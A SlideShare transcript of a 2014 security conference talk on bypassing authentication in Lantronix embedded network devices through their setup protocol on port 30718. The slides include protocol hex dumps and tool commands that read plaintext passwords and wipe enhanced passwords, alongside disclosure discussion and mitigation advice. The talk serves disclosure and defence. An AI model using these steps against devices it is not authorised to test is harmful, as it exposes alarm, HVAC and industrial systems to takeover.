SlideShare una empresa de Scribd logo

Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Descargar como ODP, PDF
V
Vlatko Kosturjak

Presentation presented at Confidence 2014 - Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Tecnología
1 de 37
1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
4 Mos Eisley Lab Lantronix Source: www.lantronix.com
5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
18 Mos Eisley Lab Source: Mohdafri. com
19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
34 Mos Eisley Lab Summary Source: duki@fb
35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard
37 Mos Eisley Lab Thank you! Questions and Answers @k0st

Recomendados

Advanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAdvanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAlienVault
 
System Center Configuration Manager-The Most Popular System Center Component
System Center Configuration Manager-The Most Popular System Center Component System Center Configuration Manager-The Most Popular System Center Component
System Center Configuration Manager-The Most Popular System Center Component C/D/H Technology Consultants
 
ISO27k ISMS implementation and certification process overview v2.pptx
ISO27k ISMS implementation and certification process overview v2.pptxISO27k ISMS implementation and certification process overview v2.pptx
ISO27k ISMS implementation and certification process overview v2.pptxNapoleon NV
 
Managing privileged account security
Managing privileged account securityManaging privileged account security
Managing privileged account securityRaleigh ISSA
 
Best practises for log management
Best practises for log managementBest practises for log management
Best practises for log managementBrian Honan
 
Vulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize RiskVulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize RiskAlienVault
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3ShivamSharma909
 
Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud
Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud
Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud Virtualization and Cloud Management Solutions
 

Recomendados

Advanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAdvanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAlienVault
 
System Center Configuration Manager-The Most Popular System Center Component
System Center Configuration Manager-The Most Popular System Center Component System Center Configuration Manager-The Most Popular System Center Component
System Center Configuration Manager-The Most Popular System Center Component C/D/H Technology Consultants
 
ISO27k ISMS implementation and certification process overview v2.pptx
ISO27k ISMS implementation and certification process overview v2.pptxISO27k ISMS implementation and certification process overview v2.pptx
ISO27k ISMS implementation and certification process overview v2.pptxNapoleon NV
 
Managing privileged account security
Managing privileged account securityManaging privileged account security
Managing privileged account securityRaleigh ISSA
 
Best practises for log management
Best practises for log managementBest practises for log management
Best practises for log managementBrian Honan
 
Vulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize RiskVulnerability Management: What You Need to Know to Prioritize Risk
Vulnerability Management: What You Need to Know to Prioritize RiskAlienVault
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3ShivamSharma909
 
Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud
Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud
Introducing VMware vRealize Suite - Purpose Built for the Hybrid Cloud Virtualization and Cloud Management Solutions
 
Beginner's Guide to SIEM
Beginner's Guide to SIEM Beginner's Guide to SIEM
Beginner's Guide to SIEM AlienVault
 
Azure F5 Solutions
Azure F5 SolutionsAzure F5 Solutions
Azure F5 SolutionsMarketingArrowECS_CZ
 
What is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the BasicsWhat is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the BasicsSagar Joshi
 
ISO 27001 2013 isms final overview
ISO 27001 2013 isms final overviewISO 27001 2013 isms final overview
ISO 27001 2013 isms final overviewNaresh Rao
 
Chapter 1 Law & Ethics
Chapter 1 Law & EthicsChapter 1 Law & Ethics
Chapter 1 Law & EthicsKarthikeyan Dhayalan
 
BATbern48_Zero Trust Architektur des ISC-EJPD.pdf
BATbern48_Zero Trust Architektur des ISC-EJPD.pdfBATbern48_Zero Trust Architektur des ISC-EJPD.pdf
BATbern48_Zero Trust Architektur des ISC-EJPD.pdfBATbern
 
Data Center Security
Data Center SecurityData Center Security
Data Center SecurityCisco Canada
 
Configuring Data Sources in AlienVault
Configuring Data Sources in AlienVaultConfiguring Data Sources in AlienVault
Configuring Data Sources in AlienVaultAlienVault
 
Configuration vs Customization: Which Is It?
Configuration vs Customization: Which Is It?Configuration vs Customization: Which Is It?
Configuration vs Customization: Which Is It?TravisToulson
 
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...Jorge Batista
 
Cyber Security Management
Cyber Security ManagementCyber Security Management
Cyber Security ManagementIT Governance Ltd
 
IT security consultancy company profile
IT security consultancy company profileIT security consultancy company profile
IT security consultancy company profileHK IT solutions... unlimited...
 
SABSA Implementation(Part VI)_ver1-0
SABSA Implementation(Part VI)_ver1-0SABSA Implementation(Part VI)_ver1-0
SABSA Implementation(Part VI)_ver1-0Maganathin Veeraragaloo
 
Maximizing Database Tuning in SAP SQL Anywhere
Maximizing Database Tuning in SAP SQL AnywhereMaximizing Database Tuning in SAP SQL Anywhere
Maximizing Database Tuning in SAP SQL AnywhereSAP Technology
 
Cybersecurity roadmap : Global healthcare security architecture
Cybersecurity roadmap : Global healthcare security architectureCybersecurity roadmap : Global healthcare security architecture
Cybersecurity roadmap : Global healthcare security architecturePriyanka Aash
 
An introduction to Cyber Essentials
An introduction to Cyber EssentialsAn introduction to Cyber Essentials
An introduction to Cyber EssentialsJisc
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM ArchitectureNishanth Kumar Pathi
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIMAlienVault
 
The Elastic Stack as a SIEM
The Elastic Stack as a SIEMThe Elastic Stack as a SIEM
The Elastic Stack as a SIEMJohn Hubbard
 
SIEM
SIEMSIEM
SIEMvikasraina
 
IBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareIBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareOktawian Powazka
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 

Más contenido relacionado

La actualidad más candente

Beginner's Guide to SIEM
Beginner's Guide to SIEM Beginner's Guide to SIEM
Beginner's Guide to SIEM AlienVault
 
What is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the BasicsWhat is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the BasicsSagar Joshi
 
ISO 27001 2013 isms final overview
ISO 27001 2013 isms final overviewISO 27001 2013 isms final overview
ISO 27001 2013 isms final overviewNaresh Rao
 
BATbern48_Zero Trust Architektur des ISC-EJPD.pdf
BATbern48_Zero Trust Architektur des ISC-EJPD.pdfBATbern48_Zero Trust Architektur des ISC-EJPD.pdf
BATbern48_Zero Trust Architektur des ISC-EJPD.pdfBATbern
 
Data Center Security
Data Center SecurityData Center Security
Data Center SecurityCisco Canada
 
Configuring Data Sources in AlienVault
Configuring Data Sources in AlienVaultConfiguring Data Sources in AlienVault
Configuring Data Sources in AlienVaultAlienVault
 
Configuration vs Customization: Which Is It?
Configuration vs Customization: Which Is It?Configuration vs Customization: Which Is It?
Configuration vs Customization: Which Is It?TravisToulson
 
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...Jorge Batista
 
Maximizing Database Tuning in SAP SQL Anywhere
Maximizing Database Tuning in SAP SQL AnywhereMaximizing Database Tuning in SAP SQL Anywhere
Maximizing Database Tuning in SAP SQL AnywhereSAP Technology
 
Cybersecurity roadmap : Global healthcare security architecture
Cybersecurity roadmap : Global healthcare security architectureCybersecurity roadmap : Global healthcare security architecture
Cybersecurity roadmap : Global healthcare security architecturePriyanka Aash
 
An introduction to Cyber Essentials
An introduction to Cyber EssentialsAn introduction to Cyber Essentials
An introduction to Cyber EssentialsJisc
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIMAlienVault
 
The Elastic Stack as a SIEM
The Elastic Stack as a SIEMThe Elastic Stack as a SIEM
The Elastic Stack as a SIEMJohn Hubbard
 

La actualidad más candente (20)

Beginner's Guide to SIEM
Beginner's Guide to SIEM Beginner's Guide to SIEM
Beginner's Guide to SIEM
 
Azure F5 Solutions
Azure F5 SolutionsAzure F5 Solutions
Azure F5 Solutions
 
What is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the BasicsWhat is SIEM? A Brilliant Guide to the Basics
What is SIEM? A Brilliant Guide to the Basics
 
ISO 27001 2013 isms final overview
ISO 27001 2013 isms final overviewISO 27001 2013 isms final overview
ISO 27001 2013 isms final overview
 
Chapter 1 Law & Ethics
Chapter 1 Law & EthicsChapter 1 Law & Ethics
Chapter 1 Law & Ethics
 
BATbern48_Zero Trust Architektur des ISC-EJPD.pdf
BATbern48_Zero Trust Architektur des ISC-EJPD.pdfBATbern48_Zero Trust Architektur des ISC-EJPD.pdf
BATbern48_Zero Trust Architektur des ISC-EJPD.pdf
 
Data Center Security
Data Center SecurityData Center Security
Data Center Security
 
Configuring Data Sources in AlienVault
Configuring Data Sources in AlienVaultConfiguring Data Sources in AlienVault
Configuring Data Sources in AlienVault
 
Configuration vs Customization: Which Is It?
Configuration vs Customization: Which Is It?Configuration vs Customization: Which Is It?
Configuration vs Customization: Which Is It?
 
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...
Step by Step installation of SAP BusinessObjects BI Platform 4.0 on Windows 2...
 
Cyber Security Management
Cyber Security ManagementCyber Security Management
Cyber Security Management
 
IT security consultancy company profile
IT security consultancy company profileIT security consultancy company profile
IT security consultancy company profile
 
SABSA Implementation(Part VI)_ver1-0
SABSA Implementation(Part VI)_ver1-0SABSA Implementation(Part VI)_ver1-0
SABSA Implementation(Part VI)_ver1-0
 
Maximizing Database Tuning in SAP SQL Anywhere
Maximizing Database Tuning in SAP SQL AnywhereMaximizing Database Tuning in SAP SQL Anywhere
Maximizing Database Tuning in SAP SQL Anywhere
 
Cybersecurity roadmap : Global healthcare security architecture
Cybersecurity roadmap : Global healthcare security architectureCybersecurity roadmap : Global healthcare security architecture
Cybersecurity roadmap : Global healthcare security architecture
 
An introduction to Cyber Essentials
An introduction to Cyber EssentialsAn introduction to Cyber Essentials
An introduction to Cyber Essentials
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM Architecture
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
The Elastic Stack as a SIEM
The Elastic Stack as a SIEMThe Elastic Stack as a SIEM
The Elastic Stack as a SIEM
 
SIEM
SIEMSIEM
SIEM
 

Similar a Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

IBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareIBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareOktawian Powazka
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCanSecWest
 
OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?ScyllaDB
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Profiling Oracle with GDB
Profiling Oracle with GDBProfiling Oracle with GDB
Profiling Oracle with GDBEnkitec
 
LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段Koji Shinkubo
 
SSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfSSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfWerner Fischer
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
Understanding Performance with DTrace
Understanding Performance with DTraceUnderstanding Performance with DTrace
Understanding Performance with DTraceahl0003
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'Positive Hack Days
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeWeaveworks
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Yulia Tsisyk
 
DEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITDEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITArtem I. Baranov
 
Networking in depth
Networking in depthNetworking in depth
Networking in depthRiadh Briki
 

Similar a Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014 (20)

IBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middlewareIBM Global Security Kit as a Cryptographic layer for IBM middleware
IBM Global Security Kit as a Cryptographic layer for IBM middleware
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
 
OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
 
Profiling Oracle with GDB
Profiling Oracle with GDBProfiling Oracle with GDB
Profiling Oracle with GDB
 
crack satellite
crack satellite crack satellite
crack satellite
 
LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段
 
02-11-2005.ppt
02-11-2005.ppt02-11-2005.ppt
02-11-2005.ppt
 
SSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfSSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperf
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
Understanding Performance with DTrace
Understanding Performance with DTraceUnderstanding Performance with DTrace
Understanding Performance with DTrace
 
No more dumb hex!
No more dumb hex!No more dumb hex!
No more dumb hex!
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave Scope
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
 
eel6935_ch2.pdf
eel6935_ch2.pdfeel6935_ch2.pdf
eel6935_ch2.pdf
 
DEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JITDEP/ASLR bypass without ROP/JIT
DEP/ASLR bypass without ROP/JIT
 
Inside Winnyp
Inside WinnypInside Winnyp
Inside Winnyp
 
Networking in depth
Networking in depthNetworking in depth
Networking in depth
 

Último

Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
